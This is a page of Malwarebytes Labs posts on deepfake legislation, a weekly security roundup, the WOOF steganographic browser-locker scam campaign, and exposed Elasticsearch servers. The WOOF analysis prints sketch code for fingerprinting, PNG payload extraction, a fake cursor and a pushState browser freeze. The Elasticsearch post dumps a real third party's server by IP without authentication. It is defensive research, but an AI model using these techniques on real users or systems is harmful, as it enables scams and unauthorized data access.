IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

Deepfakes laws and proposals flood US

In a rare example of legislative haste, roughly one dozen state and federal bills were introduced in the past 12 months to regulate deepfakes, the relatively modern technology that some fear could upend democracy.

Though the federal proposals have yet to move forward, the state bills have found quick success at home. Already three states—California, Virginia, and Texas—have enacted deepfake laws, and legislation is pending in Massachusetts, New York, and Maryland, which introduced its own bill on January 16 this year.

The laws and pending legislation vary in scope, penalties,
and focus.

The Virginia law amends current criminal law on revenge porn, making it a crime to, for instance, insert a woman’s digital likeness into a pornographic video without her consent. The Texas law, on the other hand, prohibits the use of deepfakes for election interference, like making a video that fraudulently shows a political candidate at a Neo-Nazi rally one month prior to an election.

A New York bill tackles an entirely different subject—how to treat a deceased person’s digital likeness, a reality that is coming to a screen near you (starring James Dean). And two state laws potentially address the rising threat of “cheapfakes,” low-tech digital frauds that require no artificial intelligence tools to make.

This legislative experimentation is expected for an emerging
technology, said Matthew F. Ferraro, a senior associate at the law firm
WilmerHale who advises clients on national security, cyber security, and crisis
management.

“In some ways, this is [an example] of the laboratories of
democracy,” Ferraro said, citing an idea popularized decades ago by Supreme
Court Justice Louis Brandeis. “This is what people cheer about.”

But one category of deepfakes legislation has drawn more criticism than others—the kind that solely regulates potential election interference. Groups including the American Civil Liberties Union, Electronic Frontier Foundation, and First Draft, which researches and combats disinformation, warn of threats to free speech.

Further, prioritizing political deepfakes legislation could, in effect, deprioritize the larger problem of deepfake pornography, which accounts for a whopping 96 percent of deepfake material online today, said Adam Dodge, founder of the nonprofit End Technology-Enabled Abuse, or EndTAB.

“I think it’s
important that we address future harm, I just don’t want that to come at the
expense of the people being harmed right now,” Dodge said. “We have four
deepfakes laws on the books in the United States, and 50 percent of them don’t
address 96 percent of the problem.”

Today, Malwarebytes provides a more detailed look at deepfakes legislation and laws in the United States, following our analysis last week of the country’s first-ever federal deepfake rules. Far beyond what that language requires, the following bills and laws call for civil and criminal penalties, and directly address concerns of both political disinformation and nonconsensual pornography.

Federal deepfakes legislation before Congress

Before lawmakers in Washington, DC, are at least four federal deepfakes bills in both the US House of Representatives and the Senate. They are:

  • The Identifying Outputs of Generative
    Adversarial Networks (IOGAN) Act
  • The Deepfake Report Act of 2019
  • A Bill to Require the Secretary of Defense to
    Conduct a Study on Cyberexploitation of Members of the Armed Forces and Their
    Families and for Other Purposes
  • The Defending Each and Every Person from False
    Appearances by Keeping Exploitation Subject (DEEP FAKES) to Accountability Act

The bills largely hew to one another. The IOGAN Act, for example, would require the directors of both the National Science Foundation and the National Institute of Standards and Technology to submit reports to Congress about potential research opportunities with the country’s private sector in detecting deepfakes.

The Deepfake Report Act would require the Department of Homeland Security to submit a report to Congress about the technologies used to create and detect deepfakes. Senator Ben Sasse’s “cyberexploitation” bill would require the Secretary of Defense to study the potential vulnerabilities of US armed forces members to cyberexploitation, including “misappropriated images and videos as well as deep fakes.”

The DEEP
FAKES Accountability Act, however, extends beyond reporting and research requirements.
If passed, the bill would require anyone making a deepfake—be it image, audio,
or video—to label the deepfake with a “watermark” that shows the deepfake’s
fraudulence.

But Dodge said
watermarks and labels would fail to help anyone whose likeness is used in a
nonconsensual deepfake porn video.

“The reality is, when it comes to the battle against deepfakes,
everybody is focused on detection, on debunking and unmasking a video as a
deepfake,” Dodge said. “That doesn’t help women, because the people watching those
videos don’t care that they’re fake.”

The DEEP
FAKES Accountability Act would make it a crime to knowingly fail to provide that
watermark, punishable by up to five years in prison. Further, the bill would
impose a civil penalty of up to $150,000 for each purposeful failure to provide
a watermark on a deepfake.

According to
the Electronic Frontier Foundation, those are severe penalties for activities that
the bill itself fails to fully define. For example, making a deepfake with the
intent to “humiliate” someone would become a crime, but there is no clear
definition of what that term means, or whether that humiliation would require
harm. In the bill’s attempt to stop deceitful and malicious activity, the organization
said, it may have reached too far.

“The [DEEP
FAKES Accountability Act] underscores a key question that must be answered:
from a legal and legislative perspective, what is the difference between a
malicious ‘deepfakes’ video and satire, parody, or entertainment?” the
organization wrote. “What lawmakers have discussed so far shows they do not
know how to make these distinctions.”

Statewide,
the concerns shift to whether deepfakes legislation will have its intended
effect.

State deepfakes laws and legislation

Last summer, the warnings about the democratization of deepfakes technology became reality—a new app offered for free on Windows gave users the ability to remove clothes from uploaded photos of women. The app, called DeepNude, was first discovered by Motherboard. It shut down just hours after the outlet published its first piece.

Less than one week later, a new deepfake law in Virginia came
into effect. The state’s lawmakers had passed it months earlier, in March.

Unique when compared to later state deepfake laws, Virginia’s
law did not craft a new crime for deepfake creation and distribution, but
instead expanded its current law on revenge porn to include deepfakes material.
Now, in Virginia, anyone who shares or sells nude or sexual images and videos—including
deepfakes—with the intent to “coerce, harass, or intimidate,” is guilty of a
Class 1 misdemeanor.

Dodge said he appreciated Virginia’s approach.

“The Virginia law is interesting because it’s the only law
that has taken the existing nonconsensual pornography criminal code section and
amended it to include deepfakes pornography,” Dodge said, “and I like that.”

Shortly after Virginia enacted its deepfake law, Texas
followed, passing a law that instead focused on election interference.
According to the law, the act of creating and sharing a deepfake video within 30
days of an election with the intent to “injure a candidate or influence the
result of an election” is now a Class A misdemeanor. The law’s definition of a
deepfake is broad: a video “created with the intent to deceive, that appears to
depict a real person performing an action that did not occur in reality.”

The law has already received a high-profile use-case: Houston Mayor Sylvester Turner asked the district attorney to investigate his opponent’s campaign for making a television ad that showed edited photos of the mayor, along with an allegedly fake text he sent.

In October, California followed both Virginia and Texas, passing two laws—one to prohibit nonconsensual deepfake pornography, and the other to prohibit deepfakes used to impact the outcome of an upcoming election.

The bills’ author—Assembly Member Marc Berman—said he wrote the latter bill after someone created and shared an altered video of Nancy Pelosi, appearing to show her as impaired or drunk. But the video was far from a deepfake. Instead, its creator simply took footage of the Speaker of the House of Representatives and slowed it down, making what is now referred to as a “cheapfake.”

Ferraro said that trying to pass legislation to prevent
cheapfakes will be difficult, though.

“It’s going to be very hard to write a bill that captures
all of those so-called cheapfakes, because the regular editing of videos could
fall under a definition that is too broad,” Ferraro said, explaining that standard,
everyday broadcast interviews incorporate countless edits that might change the
overall impression of the interview to audiences, even when the edits are done
for non-malicious reasons, like cutting away from a political candidate giving
a speech to show their audience.

“That’s the sort of problem of the cheapfake: Simple editing
can give vastly different impressions, based on the content,” Ferraro said.

As California, Texas, and Virginia work out the enforcement
of their laws, Maryland, New York, and Massachusetts are considering their own approaches
to legislating deepfakes.

On January 16, Maryland introduced a bill targeting political influence deepfakes. The bill, which has a scheduled hearing in early February, prohibits individuals from “willfully or knowingly influencing or attempting to influence a voter’s decision to go to the polls or to cause a vote for a particular candidate by publishing, distributing, or disseminating a deepfake online within 90 days of an election.”

The Massachusetts deepfake legislation would criminalize the
use of deepfakes for already “criminal or tortious conduct,” in effect making
it illegal to use a deepfake in conjunction with completing other crimes. So,
committing fraud? That’s a crime. But deploying a deepfake to aid in committing
that fraud? Well, that would also be a crime.

Finally, in New York, state lawmakers are trying to
legislate a different aspect of deepfakes and digital recreations—the rights to
an individual’s digital likeness. The bill was introduced last year, expired,
and was then re-introduced. It would protect a person’s digital likeness for 40
years after their death. The bill would also create a registry for surviving
family members to record their control of a deceased relative’s likeness.

The Screen Actors Guild‐American Federation of Television
and Radio Artists supported the bill.

“The state’s robust performance community should not have to endure years of costly litigation to protect their basic livelihood and artistic legacy,” the group said.

Major motion picture studios, including Disney, Warner Bros., and NBCUniversal, opposed the bill. Though Disney’s filmmakers said they received approval from the estate of the late actor Peter Cushing to use his likeness in the 2016 film Rogue One: A Star Wars Story, it’s not hard to see why required approval for future projects would prove an obstacle for Hollywood.

What next?

The opposition to deepfakes laws is clear: Such laws could
be overbroad, uninformed, and, in their attempt to regulate one problem,
actually trample on the protected rights of Americans.

The bigger question is, has the opposition been successful? In
a word, no.

Texas passed its election interference deepfake law with no recorded opposition votes in either the House or the Senate (though two House members were a “no vote” and four abstained). California similarly passed its election interference deepfake law in a 67–4 vote in the Assembly and a 29–7 vote in the Senate. After the vote, the ACLU of California wrote to the California governor, asking for a veto. It didn’t work.  

In Washington, DC, though, the situation could be different, since new federal rules on deepfakes research were approved last month. Those rules require the Director of National Intelligence to submit a report to Congress within 180 days about deepfakes capabilities across the world and possible countermeasures in the US. Until that report is submitted, Senators and Representatives might have little appetite to move forward.

Much like the statewide sweep of data privacy laws last year, the future of deepfake laws depends on political will, popularity, and whether lawmakers even have time to draft and pass such legislation. It is, after all, an election year.

The post Deepfakes laws and proposals flood US appeared first on Malwarebytes Labs.

WOOF locker: Unmasking the browser locker behind a stealthy tech support scam operation

In the early days, practically all tech support scammers would get their own leads by doing some amateur SEO poisoning and keyword stuffing on YouTube and other social media sites. They’d then leverage their boiler room to answer incoming calls from victims.

Today, these practices continue, but we are seeing more advanced operations with a clear separation between lead generation and actual call fulfillment. Malvertising campaigns and redirections from compromised sites to browser locker pages are owned and operated by experienced purveyors of web traffic.

There is one particular browser locker (browlock) campaign that had been eluding us for some time. It stands apart from the others, striking repeatedly on high-profile sites, such as the Microsoft Edge Start page, and yet eluding capture. In addition, and a first to our knowledge, the browser locker pages were built to be ephemeral with unique, time-sensitive session tokens.

In November 2019, we started dedicating more time to investigating this campaign, but it wasn’t until December that we were finally able to understand its propagation mechanism. In this blog, we share our findings by documenting how threat actors used targeted traffic-filtering coupled with steganography to create the most elaborate browser locker traffic scheme to date.

A well-documented history

There are many public reports about this tech support scam affecting users with the same red screen template. Contrary to what some people have posted online, this is not malware, and computers aren’t infected. It is simply what we call a browser locker, or browlock for short, a social engineering technique that gives the illusion of a computer virus and scares people into calling a toll-free number for assistance. Here are some examples:

One lengthy and epic forum thread on Microsoft’s forums describes how this browlock campaign has been afflicting the Microsoft Edge start page and even left Microsoft engineers puzzled as to where, exactly, it came from:

We do quite a bit of work to scan the ads we get from our exchanges, but some behave differently for certain users than they do when we do our scanning. In the future, please continue to submit feedback so we can narrow the scans on our end and potentially reproduce and remove this once and for all.

This is noteworthy for a couple of reasons: First, it is quite daring to push your browlock right on Microsoft’s own start page. Second, a large part of the targeted audience for tech support scams is going to be people who use Windows’ default browser and start page. To this day, this campaign is still active on the MSN portal.

Figure 1: Life cycle of a tech support scam campaign

This browlock was also found on many other large sites, including several online newspaper portals. For a campaign to run with such a wide distribution and for this length of time is unheard of, at least when it comes to browser lockers.

Cat-and-mouse game

Each victim report we received was more or less the same. A user would open up the MSN homepage or perhaps be browsing a popular tech portal, when all of a sudden their screen would turn red and display a warning message similar to the one shown below:

Figure 2: Browlock as seen by a victim

As we’d go to manually check the page, we would be greeted with a “404 Not Found” error message, as if it were gone. For this reason, we began calling this campaign the “404Browlock.” Attempts to replay the browser locker redirection by visiting the same portals as the victims were also unsuccessful.

Figure 3: Same browlock URL but now unavailable

Most, if not all, browlock URLs can be revisited without any special user-agent or geo-location tricks. In fact, browlocks themselves aren’t typically sophisticated; their only advantage is they can iterate through hundreds or thousands of different domain names more rapidly than one can blacklist them.

Mapping the browser locker campaign infrastructure

Despite coming up empty each time, we started to build a list of indicators of compromise (IOCs) and did some retro hunting to get a better idea of the scale of this campaign.

Most domain names are registered on the .XYZ TLD (although several other TLDs have been and continue to be used) and named using dictionary words grabbed somewhat alphabetically.

2019-12-06,transfiltration[.]xyz,158.69.0[.]190,AS 16276 (OVH SAS)
2019-12-06,transmutational[.]xyz,158.69.0[.]190,AS 16276 (OVH SAS)
2019-12-06,tricotyledonous[.]xyz,158.69.0[.]190,AS 16276 (OVH SAS)
2019-12-06,triethanolamine[.]xyz,158.69.0[.]190,AS 16276 (OVH SAS)
2019-12-06,trigonometrical[.]xyz,158.69.0[.]190,AS 16276 (OVH SAS)
2019-12-06,trithiocarbonic[.]xyz,158.69.0[.]190,AS 16276 (OVH SAS)

The threat actor hosts, on average, six domains on each VPS server, and then rotates to new ones when they are burned. After retro hunting back to June 2019, we collected over 400 unique IP addresses.

Figure 4: Graph view of domains and servers for this campaign

Looking at additional data sources, we can see that this browser locker campaign started at least as early as December 2017. At the time, the infrastructure was located on a different hosting provider and domains used the .WIN TLD.

Figure 5: The earliest known instance of the browlock

Even back then, visiting the browlock URL directly (without proper redirection) would also result in a 404 page.

Figure 6: Incomplete browlock scanned by crawler

One lone artifact, an audio file (help.mp3), was indexed by VirusTotal.

Again based on open source data, we created a rough timeline of the infrastructure the threat actors abused—from where they were first spotted on Petersburg Internet to moving briefly to DigitalOcean before settling on OVH from January 30, 2019 onward.

Figure 7: Timeline showing changes in hosting providers

Steganography to hide redirection mechanism

Given that we couldn’t identify how this browlock was propagating, we figured it must be using an unconventional trick.

Many of the sites that victims reported being on when the browlock happened contained videos, so we thought one likely vector could be video ads. This form of malvertising is more advanced than traditional malicious banners because it enables the crooks to hide their payload within media content.

Once again, we spent a fair amount of time looking at video ads but still couldn’t identify the entry point. We switched our search to another type of medium, but evidence shared with us later on confirmed the video ad infection vector.

Coincidentally, we had just been studying some interesting new developments with online credit card skimmers where malicious code was embedded into image files. This technique, known as steganography, is a clever way to hide artifacts from humans and scanners.

While developing tools to identify such rogue images, we came across what we thought might be the smoking gun. We discovered a PNG file that contained obfuscated data.

This time, though, if the fraudsters were indeed using steganography, they certainly weren’t making it obvious. We identified a malformed PNG file that contained extra data after its end-of-file marker and looked suspicious.

Figure 8: A small image hiding away data (the browlock URL)

Unlike the aforementioned credit card skimmer, which was clearly visible and recognizable with obvious character strings, this one looked like it was encoded. And clearly, the image on its own could not be weaponized without additional code and the per-victim unique key needed to decrypt it.

Anti-bot and traffic filtering

The JavaScript code that interacted with the PNG image used some light hex obfuscation and random variable naming to hide its intentions.

Figure 9: JavaScript used to fingerprint users and decode the PNG

The hex string \x57\x45\x42\x47\x4c decodes to WEBGL, and by decoding the rest of the obfuscated variable, we can see that this script is using the WEBGL_debug_renderer_info API to gather the victim’s video card properties. This allows the threat actors to sort real browsers (therefore real people) from crawlers or even virtual machines, which would not show the expected hardware information. The Zirconium group’s vast malvertising operation, disclosed in January 2018 by Jerome Dangu over at Confiant, also used that same API to filter traffic.
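
For readers unfamiliar with that API, here is a minimal, hypothetical sketch of the kind of check described above; the function and variable names are ours, not the campaign’s, and the real script is heavily obfuscated.

// Hypothetical sketch of a WEBGL_debug_renderer_info fingerprinting check.
function getGpuInfo() {
  const canvas = document.createElement('canvas');
  const gl = canvas.getContext('webgl') || canvas.getContext('experimental-webgl');
  if (!gl) return null; // no WebGL at all: likely a crawler or a stripped-down VM

  const dbg = gl.getExtension('WEBGL_debug_renderer_info');
  if (!dbg) return null;

  return {
    vendor: gl.getParameter(dbg.UNMASKED_VENDOR_WEBGL),
    renderer: gl.getParameter(dbg.UNMASKED_RENDERER_WEBGL),
  };
}

// Only "real-looking" hardware would be let through; software renderers commonly
// reported by virtual machines and headless browsers can be filtered out.
const gpu = getGpuInfo();
const looksVirtual = !gpu || /swiftshader|llvmpipe|virtualbox|vmware/i.test(String(gpu.renderer));
if (!looksVirtual) {
  // ...continue to fetch and decode the steganographic PNG
}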

But perhaps the most interesting function within this JavaScript snippet is the one that processes the actual PNG image behind the steganography. The _Nux function parses the image data by using the @#@ delimiter (as seen in Figure 8 above) and stores it within the _OIEq variable.

Figure 10: The core function responsible for the decryption of the PNG data
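
To make the mechanics concrete, here is a rough, hypothetical sketch of that extraction step. The function name and structure are ours for illustration; only the IEND/extra-data layout and the @#@ delimiter come from the analysis above.

// Fetch a PNG and return whatever is smuggled in after its IEND end-of-file chunk.
async function extractTrailingData(pngUrl) {
  const buf = new Uint8Array(await (await fetch(pngUrl)).arrayBuffer());

  // Locate the ASCII bytes "IEND" (0x49 0x45 0x4E 0x44) in the raw image data.
  let end = -1;
  for (let i = 0; i < buf.length - 3; i++) {
    if (buf[i] === 0x49 && buf[i + 1] === 0x45 && buf[i + 2] === 0x4e && buf[i + 3] === 0x44) {
      end = i;
      break;
    }
  }
  if (end === -1) return [];

  // The IEND chunk type is followed by a 4-byte CRC; anything after that is extra data.
  const trailing = buf.slice(end + 8);
  if (trailing.length === 0) return []; // clean/decoy PNG: nothing to decode

  // The campaign's script splits the smuggled payload on the "@#@" delimiter.
  return new TextDecoder('latin1').decode(trailing).split('@#@');
}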

If the user is detected as a bot or as uninteresting traffic, the PNG served does not contain the extra data after the IEND end-of-file marker, and therefore the _OIEq variable will be empty.

Figure 11: A clean/decoy PNG (for non-targets)

The function still attempts to parse the PNG, but it will fail on the eval, and will not generate the browlock URL. The user, not being considered a proper candidate, will not be redirected and won’t even be aware of the fingerprinting that just happened.

Figure 12: When the PNG does not contain any extra data, no browlock URL is returned

This kind of filtering is not usually seen (except for advanced malvertising operations), which is one of the reasons why so many victims have experienced this browlock, yet little is known about it.

Anti-replay mechanism

The next evasion technique is aimed at security folks and those trying to troubleshoot these malicious redirections. A network traffic capture (SAZ, HAR) must include the malicious JavaScript, as well as the steganographic PNG and the browlock itself.

Figure 13: Network traffic revealing the elements behind the redirection

Similar to a technique we’ve previously only observed with exploit kits, the threat actor is using one-time tokens to prevent “artificial” replays of the redirection mechanism. If the proper session key is not provided, the decryption of the PNG data will fail to produce the browlock URL.

Figure 14: When the wrong key is supplied, the code fails to generate the browlock URL
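
As the acknowledgements at the end of this post note, the trailing PNG data turns out to be RC4-encrypted with that per-session key, which is why a replay with the wrong key decrypts to garbage and the final eval simply fails. For reference, a plain textbook RC4 routine looks roughly like this; it is a generic implementation, not the campaign’s own code.

// Generic RC4: returns dataBytes XORed with the keystream derived from keyBytes.
function rc4(keyBytes, dataBytes) {
  // Key-scheduling algorithm (KSA)
  const S = Array.from({ length: 256 }, (_, i) => i);
  let j = 0;
  for (let i = 0; i < 256; i++) {
    j = (j + S[i] + keyBytes[i % keyBytes.length]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
  }

  // Pseudo-random generation algorithm (PRGA)
  const out = new Uint8Array(dataBytes.length);
  let i = 0;
  j = 0;
  for (let k = 0; k < dataBytes.length; k++) {
    i = (i + 1) & 0xff;
    j = (j + S[i]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
    out[k] = dataBytes[k] ^ S[(S[i] + S[j]) & 0xff];
  }
  return out; // only the correct session key yields code worth passing to eval
}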

Once again, we must pause for a moment and note that this kind of complexity is unheard of for something like a browser locker. While cloaking techniques are common, this is by far the most covert way we’ve seen to redirect to any browlock.

Other traffic chains

After we had discovered the PNG redirection mechanism, we shared our findings with security firm Confiant. They were aware of the domain api.imagecloudsedo[.]com but had seen it in a different campaign. Confiant nicknamed it WOOF due to a string of the same name found in the code.

Figure 15: WOOF script identified by Confiant in September 2019

Additionally, Google, with Confiant acting as an intermediary, shared yet another instance that explains the number of redirections from newspaper sites we had been seeing. This second instance of the WOOF script was loaded via video widgets.

Digital Media Communications, a company that specializes in ads converted into widgets for the web, was apparently compromised several months ago. According to data collected by the Internet Archive, one of their scripts hosted at widgets.digitalmediacommunications[.]com/chosen/chosen.jquery.min.js was injected on August 13, 2019.

Figure 16: Evidence of tampering caught via Internet Archive

A number of websites, many of them news portals, load this widget and are therefore unwittingly exposing their visitors, as the compromised library subsequently retrieves the malicious PNG from api.imagecloudsedo[.]com before redirecting to the browlock page.

Figure 17: Online newspaper site with compromised widget

It’s highly likely that there are other compromises of third parties that haven’t been found yet, although we suspect that the methods used would be similar to the ones we know about.

Examining the browser locker page

The following diagram depicts what needs to take place in order for victims to get redirected to the browser locker page after several layers of validation.

Figure 18: Flow showing redirection mechanism to browlock pages

Ultimately, the previously analyzed function will arrive at the eval part of the code and return code to launch the browlock.

top.location = '[browlock URL]';

This little bit of code redirects the current browser page to the new URL. It is, in fact, one of the most common techniques for malicious ads to redirect users to scam pages. We believe the threat actor is likely using the same trick for its other malvertising campaigns.

Figure 19: The browlock template for Google Chrome

This browser locker is clean and contained as it obfuscates its source code and has few external dependencies, such as libraries. We can see that it uses the evil cursor, which is a flaw that allows criminals to create a fake cursor that tricks users into clicking on the wrong area when they are trying to close a browlock.

Figure 20: Source code showing the fake cursor designed to interfere
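
For readers unfamiliar with the trick, it boils down to something like the following one-liner; the asset name is a placeholder for illustration, not a file from this campaign.

// A very large custom cursor whose drawn pointer sits far away from the (0,0) hotspot,
// so clicks land nowhere near where the user thinks they will.
document.documentElement.style.cursor = "url('fake-cursor-128x128.png') 0 0, auto";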

While Chrome and Edge users can somewhat get rid of the offending page, on Firefox, this is a true browlock, causing the browser to eventually crash.

Figure 21: User cannot close the browlock in Firefox

The code used to freeze the browser has been duplicated enough times to render the browser useless. In the image below, we see the same function with slightly different parameters.

Figure 22: Code responsible for the browlock effect

If we deobfuscate any of the functions, we recognize the history.pushState() method, which we reported back in 2016, and which is still not handled well by most browsers. This bug actually came to Mozilla’s attention three years ago, and more recently when someone reported the same 404Browlock:

Figure 23: User reporting same browlock to Mozilla
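
Stripped of its obfuscation, the pattern being abused is roughly the following; this is a simplified sketch, not the campaign’s exact code.

// Flooding the session history neuters the Back button and, repeated aggressively
// enough, can make some browsers unresponsive or crash them outright.
for (let i = 0; i < 100000; i++) {
  window.history.pushState({ step: i }, '', '#locked' + i);
}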

Browser lockers can be difficult to fix because they often abuse code that is otherwise perfectly legitimate, and browser vendors have to juggle performance and compatibility concerns at the same time.

Handing victims over to tech support scammers

The ultimate goal for browser lockers is to get people to call for assistance to resolve (non-existent) computer problems. This is handled by third parties via fraudulent call centers. The threat actor behind the traffic redirection and browlock will get paid for each successful lead.

To confuse victims, the fake Microsoft agent will tell you to run some commands simply intended to open up a browser window.

Figure 24: Scammer instructing victim to run a command

From there, they will ask you to download and run a remote assistance program that will enable them to take control of your computer. A few minutes later, they will use their favorite tool, notepad, to start drafting an invoice:

Figure 25: The invoice to fix this browlock

While the machine is still supposedly infected, they will simply browse to a site to take the payment for 1-year, 3-year, or 5-year plans costing $195, $245, and $345, respectively.

Where do we go from here?

Given the level of sophistication involved in this campaign, we can expect that the threat actor has diversified their traffic to have some kind of redundancy.

We hope that our efforts to expose this scheme will help others to identify the browlock redirections within their networks. Despite our repeated attempts to report these abuses, they have not been fixed. We remain available to OVH for closer collaboration to shut down this campaign.

For best protection against this and other browlocks, we recommend using our free browser extension, Browser Guard. Not only does it benefit from our domain and IP blacklist, but it can also detect and block browlocks and other tech support scams via signatureless techniques.

Acknowledgements

We would like to thank Confiant for sharing additional data regarding the other cases of the malicious script (_WOOf variant).

Thanks to @prsecurity_ for pointing out a quicker way to retrieve the browlock URL by RC4 decrypting the PNG data using the unique key found within the script.

Indicators of Compromise (IOCs)

There are simply too many IOCs to put here, so we’ve uploaded the browlock domains and IP addresses as a STIX2 file onto our GitHub page. It includes data going back to June 2019 based on indicators we collected by conducting retro hunting. Please note that this is only a partial account of this campaign based on the data we could collect.

Compromised library

widgets.digitalmediacommunications[.]com/chosen/chosen.jquery.min.js

Steganographic redirector

api.imagecloudsedo[.]com
141.98.81[.]198

Regex to identify the browlock URLs

/en/?search=\w?(%[\w_\-~.]{1,4}){10,20}&list=([0-9]00000|null)$

The post WOOF locker: Unmasking the browser locker behind a stealthy tech support scam operation appeared first on Malwarebytes Labs.

A week in security (January 13 – 19)

Last week on Malwarebytes Labs, we taught you how to prevent a rootkit attack, explained what data enrichment means, informed you about new rules on deepfakes in the US, and demonstrated how backdoors in elastic servers expose private data.

Other cybersecurity news

  • An online group of cybersecurity analysts calling themselves Intrusion Truth have revealed information about their fourth Chinese state-sponsored hacking operation. (Source: ZDNet)
  • Travelex warned customers of a phone scam threat in wake of their ransomware attack. (Source: Graham Cluley)
  • The federal government is preparing for another fight with Apple in an ongoing battle for access to encrypted iPhones. (Source: Vox recode)
  • Proof-of-concept exploit code has been published for critical flaws impacting the Cisco Data Center Network Manager (DCNM) tool for managing network platforms and switches. (Source: ThreatPost)
  • The Dutch National Cybersecurity Centre (NCSC) says that companies should consider turning off Citrix ADC and Gateway servers if the impact is acceptable. (Source: BleepingComputer)
  • Hackers stole personal information from 100,000 West Australians in a cyberattack on P&N Bank. (Source: The West Australian)
  • In an important Patch Tuesday release, Microsoft fixed critical bugs in CryptoAPI, RD Gateway, and .NET. (Source: Naked Security)
  • The latest update to Google’s Smart Lock app on iOS means you can now use your iPhone as a physical 2FA security key for logging into Google’s first-party services in Chrome. (Source: The Verge)
  • The domain name weleakinfo.com has been seized by the FBI. The website sold information claiming to have more than 12 billion records gathered from over 10,000 breaches. (Source: DarkReading)
  • Pretending to be the Permanent Mission of Norway, Emotet operators performed a targeted phishing attack against users associated with the United Nations. (Source: BleepingComputer)

Stay safe, everyone!

The post A week in security (January 13 – 19) appeared first on Malwarebytes Labs.

Business in the front, party in the back: backdoors in elastic servers expose private data

It seems like every day we read another article about a data breach or leak of cloud storage exposing millions of users’ data.

The unfortunate truth is that the majority of these leaks require no actual “hacking” on the part of the attacker. Most of the time, this highly confidential data is just sitting in open databases, ripe for the picking.
It’s all too easy to discover data leaks online, especially in cloud services, which says a lot about the state of security and preparedness for cyberattacks—we have a long way to go.

Continuing my series on insecure cloud infrastructure, where I previously covered AWS and PACS, I will be going into some detail on elastic servers. Specifically, I will cover a number of cases in which I discovered a common misconfiguration, leading to open backdoors, which expose many records of personal data.


Exposed databases using search

Before I go into detail on the accidental backdoors found in elastic servers, let’s take a look at just how easy it is to find one of these exposed databases online.

While there are dozens of tools and methods for this discovery phase, for the purposes of this demonstration, I used Shodan, a search engine that crawls the web for Internet-connected devices.

Let’s do a quick experiment and see if it yields results. With a quick Google search on elastic databases, we learn that elastic databases by default listen on port 9200.

From there, we open up Shodan and search:
elastic port:9200

This will basically bring up IPs that have a service responding on port 9200 and whose content contains the word “elastic.” Ninety-nine percent of the time, this will be an elastic search server.
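
The same query can also be run programmatically. Below is a minimal sketch against Shodan’s REST search endpoint; it assumes you have your own API key, and the response field names follow Shodan’s documentation.

// Run as an ES module (e.g. node search.mjs on Node 18+) so fetch and top-level await are available.
const SHODAN_KEY = process.env.SHODAN_KEY; // your own API key
const query = encodeURIComponent('elastic port:9200');

const res = await fetch(`https://api.shodan.io/shodan/host/search?key=${SHODAN_KEY}&query=${query}`);
const results = await res.json();
for (const match of results.matches ?? []) {
  console.log(match.ip_str, match.port, match.org);
}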

For the sake of full comprehension, I will give a 10-second primer on how to use the elastic search API.

Elastic can be compared to MySQL in the following way:

MySQL                        Elastic
Databases                    Indices
Tables                       Types
Records (columns and rows)   Documents (with properties)

Here are a few key commands to help you navigate any elastic instance. The first is the /_cat command and the second is /_search?pretty=true.
The cat command simply lists information, and it is a good starting point to understand what indices or fields you have to work with.
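
In practice, exploring an open instance boils down to a couple of unauthenticated HTTP GETs. Here is a hedged sketch; the host below is a placeholder documentation address and the index name is invented, so substitute your own lab instance.

// Run as an ES module on Node 18+ (or paste into a browser console) so fetch is available.
const host = 'http://203.0.113.10:9200'; // placeholder TEST-NET address, not a real target

// List the available _cat helpers, then the indices on the server.
console.log(await (await fetch(`${host}/_cat/`)).text());
console.log(await (await fetch(`${host}/_cat/indices?v`)).text());

// Dump documents from one index, pretty-printed (think "SELECT * FROM table_name").
console.log(await (await fetch(`${host}/some_index/_search?pretty=true`)).text());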

Elastic servers

Jumping into Shodan, we start our search for elastic databases.

Let’s choose a random IP that comes up from the Shodan query. In this case, it is a server residing in China: https://www.shodan.io/host/47.104.101.159#9200

We can check if it is open to the world by typing in: http://47.104.101.159:9200/_cat/

This brings up the following results:

Seems like no authentication so far. Let’s look at what indices exist here by typing in /_cat/indices, which gives us the following results:

So far so good. It is clear that, at the moment, no authentication is likely to stop us from accessing the data. Now we can list the contents of one of these indices, similar to a SELECT * FROM table_name in SQL. Let’s choose one at random, kms_news, which looks to have 37 records inside.

We type http://47.104.101.159:9200/dzkj_news/_search?pretty=true
and voila! All the data spits out for us with hardly any effort at all.

As you can see, it was quite easy to find exposed data in a random elastic server online. In less than a minute, we found an exposed server and could continue to dump all the data. I am certain that if we spent a bit more time, we would find a database with a more critical leak.

There is a reason, after all, that these databases have received so much press for their infamous leaks.


The backdoor

Now let’s get to the topic at hand: the misconfigurations leading to the backdoor.

Along with elastic, you often hear the word Kibana. This is basically the GUI front end to an elastic database, allowing you to browse/search data and configure the structure and details of the elastic instance.

As such, it is common for companies to have an internal elastic DB on premises and expose the Kibana front end so that employees can access the data from their web browser, fully authenticated. In this setup, the Kibana server listens on port 5601, open to the Internet, and pulls the data from an internal elastic DB on the company’s local intranet.

Proper configuration

So where does the backdoor lie? Well, after having done an exhaustive search of various Kibana servers online, I noticed something funny happening on a large number of results.

I would browse to the Kibana instance and receive the login screen as expected, but after doing a port scan using nmap on the same IP, I noticed a familiar port being open:

The infamous 9200!

To be specific, I found more than 20 servers within a span of five minutes with this same misconfiguration. What’s going on here is that an admin set up elastic search and decided to allow access through the Kibana front end, restricted by proper authentication. The problem, however, is that the actual data store on port 9200 isn’t just communicating internally. It, too, is exposed to the Internet, allowing backdoor access to the data directly from elastic queries carried out by anyone who wants to look, just as we did in the example above.

Here is an illustration showing the misconfiguration, which should make it all the more clear.

Finding port 9200 exposed to the public does not mean there will be something of value inside. However, the combination of both ports being exposed while access is restricted only on Kibana almost guarantees that there is data the company wanted to keep private.
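
To make that concrete, here is a hypothetical sketch of such a check: given a host whose Kibana login page sits on port 5601, see whether the underlying data store on 9200 answers without any authentication. The function name and logic are ours, for illustration only, and should only be pointed at systems you are authorized to test.

// Returns true if the elastic data store answers unauthenticated on port 9200.
// Requires fetch and AbortSignal.timeout (modern browsers or Node 18+).
async function hasOpenBackdoor(host) {
  try {
    const res = await fetch(`http://${host}:9200/_cat/indices`, {
      signal: AbortSignal.timeout(5000), // don't hang on filtered ports
    });
    return res.ok; // a 200 with an index listing means the data is wide open
  } catch {
    return false; // closed, filtered, or requires authentication
  }
}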

Elastic ready to snap

